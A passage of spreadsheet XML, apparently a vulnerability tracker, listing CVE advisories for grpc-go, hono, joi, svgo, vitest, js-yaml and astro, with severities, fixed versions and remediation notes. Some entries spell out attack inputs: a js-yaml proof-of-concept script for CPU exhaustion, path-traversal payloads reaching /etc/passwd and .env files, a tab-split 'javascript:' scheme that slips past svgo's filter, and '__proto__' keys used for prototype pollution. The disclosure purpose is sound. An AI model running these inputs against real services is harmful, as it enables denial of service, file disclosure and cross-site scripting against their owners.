| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D62" s="5" t="inlineStr" /><c r="E62" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.003</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr" /><c r="L62" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M62" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N62" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr" /><c r="S62" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D63" s="5" t="inlineStr" /><c r="E63" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.003</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr" /><c r="L63" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M63" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N63" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr" /><c r="S63" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D64" s="5" t="inlineStr" /><c r="E64" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.004</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr" /><c r="L64" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M64" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N64" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr" /><c r="S64" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D65" s="5" t="inlineStr" /><c r="E65" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.003</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M65" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N65" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr" /><c r="S65" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D66" s="5" t="inlineStr" /><c r="E66" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.003</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M66" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N66" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr" /><c r="S66" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D67" s="5" t="inlineStr" /><c r="E67" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M67" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N67" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr" /><c r="S67" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D68" s="5" t="inlineStr" /><c r="E68" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.003</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M68" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N68" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr" /><c r="S68" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D69" s="5" t="inlineStr" /><c r="E69" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.003</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M69" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N69" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr" /><c r="S69" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin failed to remove some executable links. Namespace-prefixed SVG anchors and URL schemes containing ASCII tabs or newlines could bypass its checks. Applications that used this plugin as their only protection for untrusted SVG input could expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Two related bypasses were present:

1. The plugin inspected unprefixed SVG `&lt;a&gt;` elements but did not recognize namespace-prefixed SVG anchors such as `&lt;svg:a&gt;` when the prefix was bound to the SVG namespace. Their executable `href` or namespaced `*:href` values remained intact.
2. The URL check did not account for ASCII tab, line-feed, or carriage-return characters embedded in a scheme. Browsers remove these characters before parsing the scheme, so values such as `java&amp;#9;script:` could remain executable after bypassing the plugin's `javascript:` check.

Anchors in unrelated custom namespaces are not executable SVG anchors and remain untouched.

## Impact

If an application optimized attacker-controlled SVGs with `removeScripts` and then served the result in an active browser context, a victim could follow a link that executes script in the SVG's origin. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable it are not relying on the affected behavior. Typical local optimization of trusted SVG files is not affected.

## Patches

Upgrade to one of the following releases for the maintained release line in use:

| Release line | Patched version | Plugin |
| --- | --- | --- |
| v2 | 2.8.4 | `removeScriptElement` |
| v3 | 3.3.5 | `removeScriptElement` |
| v4 | 4.1.0 | `removeScripts` |

The fix makes SVG anchor handling namespace-aware and strips ASCII tabs, line feeds, and carriage returns before checking executable URL schemes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. Applications can also reject links from untrusted SVG input and avoid serving user-controlled SVGs in an active same-origin context.

## References

- v4 fix: https://github.com/svg/svgo/pull/2268
- related executable URL hardening: https://github.com/svg/svgo/pull/2263
- v3 backport: https://github.com/svg/svgo/pull/2269
- v2 backport: https://github.com/svg/svgo/pull/2272
- v4.1.0 release: https://github.com/svg/svgo/releases/tag/v4.1.0
- v3.3.5 release: https://github.com/svg/svgo/releases/tag/v3.3.5
- v2.8.4 release: https://github.com/svg/svgo/releases/tag/v2.8.4</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D70" s="5" t="inlineStr" /><c r="E70" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.004</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M70" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N70" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr" /><c r="S70" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D71" s="5" t="inlineStr" /><c r="E71" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.004</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M71" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N71" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr" /><c r="S71" s="5" t="inlineStr"><is><t>## Summary

`maxTotalMergeKeys` does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.

## Example

```yaml
arr: &amp;arr [{}, {}, {}, ...] # N empty mappings
targets:
  - &lt;&lt;: *arr                # repeated K times
```

For every target, the loader iterates all `N` elements of `arr`. This results in `O(N * K)` work while `totalMergeKeys` remains unchanged.

## PoC

```js
import { performance } from 'node:perf_hooks'
import { load, YAML11_SCHEMA } from 'js-yaml'

const n = 20000

const src =
  'arr: &amp;arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' +
  'targets:\n' +
  '  - &lt;&lt;: *arr\n'.repeat(n)

const started = performance.now()

load(src, { schema: YAML11_SCHEMA })

console.log(`${(performance.now() - started).toFixed(1)} ms`)
```

Observed results:

| N | YAML size | Time |
|---:|---:|---:|
| 800 | ~13 KB | ~20 ms |
| 3200 | ~50 KB | ~180 ms |
| 20000 | ~500 KB | ~13 s |

## Impact

An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.

## Fix

Count each merge-source mapping as one budget unit, in addition to counting its keys.

## Difference with v5

In v3 &amp; v4, merge is enabled by default. So, the severity score is higher.</t></is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D72" s="5" t="inlineStr" /><c r="E72" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.004</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr" /><c r="L72" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M72" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N72" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr" /><c r="S72" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

